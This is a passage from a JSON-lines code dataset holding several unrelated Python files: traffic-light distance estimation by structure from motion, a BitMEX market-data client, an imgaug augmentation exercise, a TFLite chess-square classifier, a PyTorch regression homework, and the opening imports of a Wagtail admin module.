"django.conf.settings.APPLICATION_NAME", "line_number": 837, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 837, "usage_type": "name"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 838, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 838, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 839, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 839, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.all", "line_number": 841, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 841, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 841, "usage_type": "name"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 846, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 846, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 893, "usage_type": "call"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 893, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 893, "usage_type": "name"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 894, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 894, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 895, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 895, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application.objects.all", "line_number": 896, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 896, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 896, "usage_type": "name"}, {"api_name": "django.template.loader.get_template", "line_number": 899, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 899, "usage_type": "name"}, {"api_name": "django.conf.settings.APPLICATION_NAME", "line_number": 902, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 902, "usage_type": "name"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal.send", "line_number": 906, "usage_type": "call"}, {"api_name": "applicationManager.signals.signals.application_creation_failed_signal", "line_number": 906, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.__class__", "line_number": 906, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 906, "usage_type": "name"}, {"api_name": "applicationManager.models.Application.objects.get", "line_number": 907, "usage_type": "call"}, {"api_name": "applicationManager.models.Application.objects", "line_number": 907, "usage_type": "attribute"}, {"api_name": "applicationManager.models.Application", "line_number": 907, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 916, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 917, "usage_type": "call"}, {"api_name": "os.path", "line_number": 917, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 918, "usage_type": "call"}, {"api_name": "os.path", "line_number": 918, "usage_type": "attribute"}, {"api_name": "django.urls.path", "line_number": 928, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 936, "usage_type": "argument"}, {"api_name": "applicationManager.models.AppModel.objects.get", "line_number": 1060, "usage_type": "call"}, {"api_name": "applicationManager.models.AppModel.objects", "line_number": 1060, "usage_type": "attribute"}, {"api_name": "applicationManager.models.AppModel", "line_number": 1060, "usage_type": "name"}]} +{"seq_id": "233951673", "text": "import numpy as np\nfrom scipy.spatial import distance\n\ndef calc_TFL_dist(prev_container, curr_container, focal, pp):\n norm_prev_pts, norm_curr_pts, R, foe, tZ = prepare_3D_data(prev_container, curr_container, focal, pp)\n if(abs(tZ) < 10e-6):\n print('tz = ', tZ)\n elif (norm_prev_pts.size == 0):\n print('no prev points')\n elif (norm_prev_pts.size == 0):\n print('no curr points')\n else:\n curr_container.corresponding_ind, curr_container.traffic_lights_3d_location, curr_container.valid = calc_3D_data(norm_prev_pts, norm_curr_pts, R, foe, tZ)\n return curr_container\n\ndef prepare_3D_data(prev_container, curr_container, focal, pp):\n norm_prev_pts = normalize(prev_container.traffic_light, focal, pp)\n norm_curr_pts = normalize(curr_container.traffic_light, focal, pp)\n R, foe, tZ = decompose(np.array(curr_container.EM))\n return norm_prev_pts, norm_curr_pts, R, foe, tZ\n\ndef calc_3D_data(norm_prev_pts, norm_curr_pts, R, foe, tZ):\n norm_rot_pts = rotate(norm_prev_pts, R)\n pts_3D = []\n corresponding_ind = []\n validVec = []\n for p_curr in norm_curr_pts:\n corresponding_p_ind, corresponding_p_rot = find_corresponding_points(p_curr, norm_rot_pts, foe)\n if corresponding_p_ind == None and corresponding_p_rot == None:\n break\n Z = calc_dist(p_curr, corresponding_p_rot, foe, tZ)\n valid = (Z > 0)\n if not valid:\n Z = 0\n validVec.append(valid)\n P = Z * np.array([p_curr[0], p_curr[1], 1])\n pts_3D.append((P[0], P[1], P[2]))\n corresponding_ind.append(corresponding_p_ind)\n return corresponding_ind, np.array(pts_3D), validVec\n\ndef normalize(pts, focal, pp):\n # transform pixels into normalized pixels using the focal length and principle point\n # 𝑥 ≔ (𝑥 − 𝑝𝑝_𝑥) / 𝑓 =𝑋/𝑍\n res = list()\n for point in pts:\n res.append([point[0] - pp[0], point[1] - pp[1]] / focal)\n return np.array(res)\n\n \ndef unnormalize(pts, focal, pp):\n # transform normalized pixels into pixels using the focal length and principle point\n # x ≔ (𝑥 * f + 𝑝𝑝_𝑥) \n res = list()\n for point in pts:\n res.append([point[0] * focal + pp[0], point[1] * focal + pp[1]])\n return np.array(res)\n\ndef decompose(EM):\n # extract R, foe and tZ from the Ego Motion\n R = EM[:3,:3]\n tZ = EM[2,3]\n #foe = (e_x, e_y) = (p_x/t_z, p_y/t_z)\n foe = np.array([EM[0, 3], EM[1, 3]])/tZ\n return R, foe, tZ\n\ndef rotate(pts, R):\n # rotate the points - pts using R\n # ((𝑥 ̃_𝑟, 𝑦 ̃_𝑟, 1)) = 1 / 𝑍_𝑟 * 𝑷_𝒓 = 𝑍_𝑝 / 𝑍_𝑟 * R((𝑥_𝑝, 𝑦_𝑝, 1)) ≔ 𝑍_𝑝 / 𝑍_𝑟 * ((a,𝑏,𝑐))\n res = list()\n for point in pts:\n point_rotate = R.dot(np.array([point[0], point[1], 1]))\n # 𝑥_𝑟 = 𝑎/𝑐\n # 𝑦_𝑟 = 𝑏/𝑐 \n point_rotate = (point_rotate[0], point_rotate[1])/point_rotate[2]\n res.append(point_rotate)\n return np.array(res)\n\ndef find_corresponding_points(p, norm_pts_rot, foe):\n # compute the epipolar line between p and foe\n # run over all norm_pts_rot and find the one closest to the epipolar line\n # return the closest point and its index\n # 𝑦 = 𝑚𝑥 + 𝑛 =((𝑒_𝑦 − 𝑦) / (𝑒_𝑥 − 𝑥)) * 𝑥 + (𝑦*𝑒_𝑥 − 𝑒_𝑦*𝑥) / (𝑒_𝑥 − 𝑥)\n m = (foe[1] - p[1]) / (foe[0] - p[0])\n n = ((p[1] * foe[0]) - (foe[1] * p[0])) / (foe[0] - p[0])\n # the distance of p from 𝑙 is: 𝑑= abs((𝑚𝑥 + 𝑛 − 𝑦) / sqrt(𝑚^2 + 1))\n denominator = np.sqrt(m * m + 1)\n distance = abs(m * norm_pts_rot[0][0] + n - norm_pts_rot[0][1]) / denominator\n closest_index = 0\n closest_point = norm_pts_rot[0]\n for index, point in enumerate(norm_pts_rot):\n curr_distance = abs(m * point[0] + n - point[1]) / denominator\n if curr_distance < distance:\n distance = curr_distance\n closest_index = index\n closest_point = point\n\n # if distance.euclidean(closest_point , p) > 75:\n # return None, None\n return closest_index, closest_point\n\n\ndef calc_dist(p_curr, p_rot, foe, tZ):\n # calculate the distance of p_curr using x_curr, x_rot, foe_x and tZ\n # calculate the distance of p_curr using y_curr, y_rot, foe_y and tZ\n # combine the two estimations and return estimated Z\n\n # 𝒁 = (𝒕_𝒁 ∙ (𝒆_𝒙 − 𝑥_𝑟)) / (𝑥_𝑐 − 𝑥_𝑟)\n z_x = (tZ * (foe[0] - p_rot[0])) / (p_curr[0] - p_rot[0])\n\n # 𝒁 = (𝒕_𝒁 ∙ (𝒆_y − y_𝑟)) / (y_𝑐 − y_𝑟)\n z_y = (tZ * (foe[1] - p_rot [1])) / (p_curr[1] - p_rot[1])\n\n Z_x_w = abs(p_curr[0] - p_rot[0])\n Z_y_w = abs(p_curr[1] - p_rot[1])\n\n sum_w = Z_x_w + Z_y_w\n if (Z_x_w + Z_y_w) == 0:\n return 0\n Z_x_w /= sum_w\n Z_y_w /= sum_w\n Z = Z_x_w * z_x + Z_y_w * z_y\n \n return Z\n\n", "sub_path": "phase_3/SFM.py", "file_name": "SFM.py", "file_ext": "py", "file_size_in_byte": 4898, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 86, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 87, "usage_type": "name"}, {"api_name": "scipy.spatial.distance", "line_number": 92, "usage_type": "name"}, {"api_name": "scipy.spatial.distance", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "3805558", "text": "from bitmex_ws import Bitmex_WS\nfrom exchange import Exchange\nfrom dateutil import parser\nimport traceback\nimport datetime\nimport requests\n\n\nclass Bitmex(Exchange):\n \"\"\"BitMEX exchange model\"\"\"\n\n MAX_BARS_PER_REQUEST = 750\n BASE_URL = \"https://www.bitmex.com/api/v1\"\n BARS_URL = \"/trade/bucketed?binSize=\"\n # WS_URL = \"wss://testnet.bitmex.com/realtime\"\n WS_URL = \"wss://www.bitmex.com/realtime\"\n TIMESTAMP_FORMAT = '%Y-%m-%d%H:%M:%S.%f'\n\n def __init__(self, logger):\n super()\n self.logger = logger\n self.name = \"BitMEX\"\n self.symbols = [\"XBTUSD\", \"ETHUSD\"]\n self.channels = [\"trade\"] # , \"orderBookL2\"\n self.origin_tss = {\"XBTUSD\": 1483228800, \"ETHUSD\": 1533200520}\n self.api_key = None\n self.api_secret = None\n\n # only ever stores the most recent minutes bars, not persistent\n self.bars = {}\n\n # connect to websocket\n self.ws = Bitmex_WS(\n self.logger, self.symbols, self.channels, self.WS_URL,\n self.api_key, self.api_secret)\n if not self.ws.ws.sock.connected:\n self.logger.debug(\"Failed to to connect to BitMEX websocket.\")\n\n def parse_ticks(self):\n if not self.ws.ws:\n self.logger.debug(\"BitMEX websocket disconnected.\")\n else:\n all_ticks = self.ws.get_ticks()\n target_minute = datetime.datetime.utcnow().minute - 1\n ticks_target_minute = []\n tcount = 0\n\n # search from end of tick list to grab newest ticks first\n for i in reversed(all_ticks):\n try:\n ts = i['timestamp']\n if type(ts) is not datetime.datetime:\n ts = parser.parse(ts)\n except Exception:\n self.logger.debug(traceback.format_exc())\n # scrape prev minutes ticks\n if ts.minute == target_minute:\n ticks_target_minute.append(i)\n ticks_target_minute[tcount]['timestamp'] = ts\n tcount += 1\n # store the previous-to-target bar's last\n # traded price to use as the open price for target bar\n if ts.minute == target_minute - 1:\n ticks_target_minute.append(i)\n ticks_target_minute[tcount]['timestamp'] = ts\n break\n ticks_target_minute.reverse()\n\n # reset bar dict ready for new bars\n self.bars = {i: [] for i in self.symbols}\n\n # build 1 min bars for each symbol\n for symbol in self.symbols:\n ticks = [\n i for i in ticks_target_minute if i['symbol'] == symbol]\n bar = self.build_OHLCV(ticks, symbol)\n self.bars[symbol].append(bar)\n # self.logger.debug(bar)\n\n def get_bars_in_period(self, symbol, start_time, total):\n \"\"\"Returns specified amount of 1 min bars starting from start_time.\n E.g get_bars_in_period(\"XBTUSD\", 1562971900, 100)\"\"\"\n\n if total >= self.MAX_BARS_PER_REQUEST:\n total = self.MAX_BARS_PER_REQUEST\n\n # convert epoch timestamp to ISO 8601\n start = datetime.datetime.utcfromtimestamp(start_time).isoformat()\n timeframe = \"1m\"\n\n # request url string\n payload = (\n f\"{self.BASE_URL}{self.BARS_URL}{timeframe}&\"\n f\"symbol={symbol}&filter=&count={total}&\"\n f\"startTime={start}&reverse=false\")\n bars_to_parse = requests.get(payload).json()\n\n # store only required values (OHLCV) and convert timestamp to epoch\n new_bars = []\n for bar in bars_to_parse:\n new_bars.append({\n 'symbol': symbol,\n 'timestamp': int(parser.parse(bar['timestamp']).timestamp()),\n 'open': bar['open'],\n 'high': bar['high'],\n 'low': bar['low'],\n 'close': bar['close'],\n 'volume': bar['volume']})\n\n return new_bars\n\n def get_origin_timestamp(self, symbol: str):\n \"\"\"Return millisecond timestamp of first available 1 min bar. If the\n timestamp is stored, return that, otherwise poll the exchange.\"\"\"\n\n if self.origin_tss[symbol] is not None:\n return self.origin_tss[symbol]\n else:\n payload = (\n f\"{self.BASE_URL}{self.BARS_URL}1m&symbol={symbol}&filter=&\"\n f\"count=1&startTime=&reverse=false\")\n\n response = requests.get(payload).json()[0]['timestamp']\n\n return int(parser.parse(response).timestamp())\n", "sub_path": "bitmex.py", "file_name": "bitmex.py", "file_ext": "py", "file_size_in_byte": 4680, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "exchange.Exchange", "line_number": 9, "usage_type": "name"}, {"api_name": "bitmex_ws.Bitmex_WS", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "attribute"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parse", "line_number": 53, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 53, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 88, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 88, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 96, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 103, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 103, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 123, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 125, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 125, "usage_type": "name"}]} +{"seq_id": "430008966", "text": "'''\n시작 시각 : 20:40\n종료 시각 : 23:40\n\n1) CreateSamples.py에 현재 사용하고 있지 않은, 새로운 방식의 Data Agumentation 코드를 2가지 추가해 주세요.\n해당 부분의 코드만 별도로 현재 파일(Q3.py)에 붙여넣어 주세요.\n\n2) (1)의 output으로 생성된 이미지 sample 5장을 AI/ 폴더에 넣어주세요.\n앞서 새롭게 추가한 Agumentation이 잘 확인될 수 있는 이미지로 첨부해 주세요.\n'''\n\nfrom random import random\n\ndef random_crop(img, mask, width, height):\n assert img.shape[0] >= height\n assert img.shape[1] >= width\n assert img.shape[0] == mask.shape[0]\n assert img.shape[1] == mask.shape[1]\n x = random.randint(0, img.shape[1] - width)\n y = random.randint(0, img.shape[0] - height)\n img = img[y:y+height, x:x+width]\n mask = mask[y:y+height, x:x+width]\n return img, mask\n\nimport numpy as np\nimport imgaug.augmenters as iaa\n\ndef load_batch(batch_idx):\n # dummy function, implement this\n # Return a numpy array of shape (N, height, width, #channels)\n # or a list of (height, width, #channels) arrays (may have different image\n # sizes).\n # Images should be in RGB for colorspace augmentations.\n # (cv2.imread() returns BGR!)\n # Images should usually be in uint8 with values from 0-255.\n return np.zeros((128, 32, 32, 3), dtype=np.uint8) + (batch_idx % 255)\n\ndef train_on_images(images):\n # dummy function, implement this\n pass\n\n# Pipeline:\n# (1) Crop images from each side by 1-16px, do not resize the results\n# images back to the input size. Keep them at the cropped size.\n# (2) Horizontally flip 50% of the images.\n# (3) Blur images using a gaussian kernel with sigma between 0.0 and 3.0.\nseq = iaa.Sequential([\n iaa.Crop(px=(1, 16), keep_size=False),\n iaa.Fliplr(0.5),\n iaa.GaussianBlur(sigma=(0, 3.0))\n])\n\nfor batch_idx in range(100):\n images = load_batch(batch_idx)\n images_aug = seq(images=images) # done by the library\n train_on_images(images_aug)", "sub_path": "AI/Q3.py", "file_name": "Q3.py", "file_ext": "py", "file_size_in_byte": 2013, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "random.random.randint", "line_number": 19, "usage_type": "call"}, {"api_name": "random.random", "line_number": 19, "usage_type": "name"}, {"api_name": "random.random.randint", "line_number": 20, "usage_type": "call"}, {"api_name": "random.random", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 36, "usage_type": "attribute"}, {"api_name": "imgaug.augmenters.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 47, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Crop", "line_number": 48, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 48, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Fliplr", "line_number": 49, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 49, "usage_type": "name"}, {"api_name": "imgaug.augmenters.GaussianBlur", "line_number": 50, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "606938316", "text": "import numpy as np\nimport tflite_runtime.interpreter as tflite\n\nclass TfLiteModel:\n def __init__(self):\n self.interpreter = tflite.Interpreter(model_path=\"/zugzwang/training/model.tflite\")\n self.interpreter.allocate_tensors()\n \n self.input_details = self.interpreter.get_input_details()\n self.output_details = self.interpreter.get_output_details()\n \n print(self.input_details[0]['dtype'])\n self.count = self.input_details[0]['shape'][0] # Only 1 image to be input\n self.height = self.input_details[0]['shape'][1]\n self.width = self.input_details[0]['shape'][2]\n self.depth = self.input_details[0]['shape'][3]\n print(\"Expected input count (N) = \" + str(self.count))\n print(\"Expected input height (H) = \" + str(self.height))\n print(\"Expected input width (W) = \" + str(self.width))\n print(\"Expected input depth (D) = \" + str(self.depth))\n\n print(self.output_details[0]['dtype'])\n self.rows = self.output_details[0]['shape'][0]\n self.cols = self.output_details[0]['shape'][1]\n print(\"Expected output rows = \" + str(self.rows))\n print(\"Expected output cols = \" + str(self.cols))\n\n def classifySquare(self, one_square):\n # Infer piece color in provided Chess square\n self.interpreter.set_tensor(self.input_details[0]['index'], one_square)\n self.interpreter.invoke()\n softmax_output = self.interpreter.get_tensor(self.output_details[0]['index'])\n softmax_output = np.round(np.squeeze(softmax_output))\n\n # Map neural network softmax output to corresponding class\n if softmax_output[0] == 1:\n prediction = -1 # black\n elif softmax_output[1] == 1:\n prediction = 0 # empty\n elif softmax_output[2] == 1:\n prediction = 1 # white\n\n return prediction", "sub_path": "modules/tflite_model.py", "file_name": "tflite_model.py", "file_ext": "py", "file_size_in_byte": 1889, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tflite_runtime.interpreter.Interpreter", "line_number": 6, "usage_type": "call"}, {"api_name": "tflite_runtime.interpreter", "line_number": 6, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "193974437", "text": "# Design out model (input,output size,forward pass)\n# Construct loss and optimizer\n# Training loop\n# - forward pass - compute prediction\n# - backward pass - gradients\n# - Update weights\n\nimport torch as torch\nimport torch.nn as nn\nimport matplotlib.pyplot as plt\nX=torch.tensor([-1.67245526,-2.36540279,-2.14724263,1.40539096,1.24297767,-1.71043904,2.31579097,2.40479939,-2.22112823], dtype=torch.float32)\nY=torch.tensor([-18.56122168, -24.99658931, -24.41907817, -2.688209,\n -1.54725306, -19.18190097, 1.74117419,\n 3.97703338, -24.80977847], dtype=torch.float32)\nw1 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\nw2 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\nw3 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\nw4 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\nw5 = torch.tensor(0.0,dtype=torch.float32,requires_grad=True)\n\n\n\"\"\" print('w0 = {} w1 = {} w2 = {} w3 = {} w4 = {}'.format(w0, w1, w2, w3, w4)) \"\"\"\n\n# model prediction\ndef forward(x):\n result1 = w1 + 0 * x\n result2 = w1 + w2 * x\n result3 = w1 + w2 * x + w3 * (x ** 2)\n result4 = w1 + w2 * x + w3 * (x ** 2) + w4 * (x ** 3)\n result5 = w1 + w2 * x + w3 * (x ** 2) + w4 * (x ** 3) + w5 * (x ** 4)\n return result1, result2, result3, result4, result5\n \n# loss \nloss=nn.MSELoss()\n\n#gradient\nlearning_rate = 0.001\noptimizer1=torch.optim.SGD([w1],lr=learning_rate)\noptimizer2=torch.optim.SGD([w2],lr=learning_rate)\noptimizer3=torch.optim.SGD([w3],lr=learning_rate)\noptimizer4=torch.optim.SGD([w4],lr=learning_rate)\noptimizer5=torch.optim.SGD([w5],lr=learning_rate)\n\n#Training\n\nn=1000\nfor epoch in range(n):\n # model prediction\n result1, result2, result3, result4, result5 = forward(X)\n\n #loss and gradients\n l1=loss(Y,result1)\n l1.backward()\n g = w1.grad.item()\n optimizer1.step()\n optimizer1.zero_grad()\n\n l2=loss(Y,result2)\n l2.backward()\n optimizer2.step()\n optimizer2.zero_grad()\n\n l3=loss(Y,result3)\n l3.backward()\n optimizer3.step()\n optimizer3.zero_grad()\n\n l4=loss(Y,result4)\n l4.backward()\n optimizer4.step()\n optimizer4.zero_grad()\n\n l5=loss(Y,result5)\n l5.backward()\n optimizer5.step()\n optimizer5.zero_grad()\n \n #update weights\n\n \n if epoch %100 == 0:\n print(f'epoch {epoch+1}: w1 = {w1:.3f}, w2 = {w2:.3f}, w3 = {w3:.3f}, w4 = {w4:.3f}, w5 = {w5:.3f}') \n\n#print(predict1, predict2, predict3, predict4, predict5)\nprint(' result1 = {}\\n result2 = {}\\n result3 = {}\\n result4 = {}\\n result5 = {}'.format(result1, result2, result3, result4, result5))\n\n#Plotting\nplt.xlabel('X values')\nplt.ylabel('Y values/predicted values')\nf1 = plt.figure(1)\nplt.plot(X,Y,'ro')\nplt.plot(X,result1.data,'bo')\nplt.title('For n=1')\n\nf2 = plt.figure(2)\nplt.plot(X,Y,'ro')\nplt.plot(X,result2.data,'bo')\nplt.title('For n=2')\n\nf3 = plt.figure(3)\nplt.plot(X,Y,'ro')\nplt.plot(X,result3.data,'bo')\nplt.title('For n=3')\n\nf4 = plt.figure(4)\nplt.plot(X,Y,'ro')\nplt.plot(X,result4.data,'bo')\nplt.title('For n=4')\n\nf5 = plt.figure(5)\nplt.plot(X,Y,'ro')\nplt.plot(X,result5.data,'bo')\nplt.title('For n=5')\n\nplt.show()\n", "sub_path": "HW2/Assignment2-PartA.py", "file_name": "Assignment2-PartA.py", "file_ext": "py", "file_size_in_byte": 3151, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "torch.tensor", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 34, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 41, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}]} +{"seq_id": "563633634", "text": "import django_filters\nfrom django.apps import apps\nfrom django.contrib.admin.utils import quote, unquote\nfrom django.core import checks\nfrom django.core.exceptions import ImproperlyConfigured, PermissionDenied\nfrom django.http import Http404\nfrom django.shortcuts import get_object_or_404, redirect\nfrom django.urls import path, re_path, reverse\nfrom django.utils.text import capfirst\nfrom django.utils.translation import gettext as _\nfrom django.utils.translation import gettext_lazy\n\nfrom wagtail import hooks\nfrom wagtail.admin.checks import check_panels_in_model\nfrom wagtail.admin.filters import DateRangePickerWidget, WagtailFilterSet\nfrom wagtail.admin.menu import Menu, MenuItem, SubmenuMenuItem\nfrom wagtail.admin.panels.group import ObjectList\nfrom wagtail.admin.panels.model_utils import extract_panel_definitions_from_model_class\nfrom wagtail.admin.ui.tables import (\n BulkActionsCheckboxColumn,\n Column,\n DateColumn,\n InlineActionsTable,\n LiveStatusTagColumn,\n TitleColumn,\n UserColumn,\n)\nfrom wagtail.admin.views import generic\nfrom wagtail.admin.views.generic import history, lock, workflow\nfrom 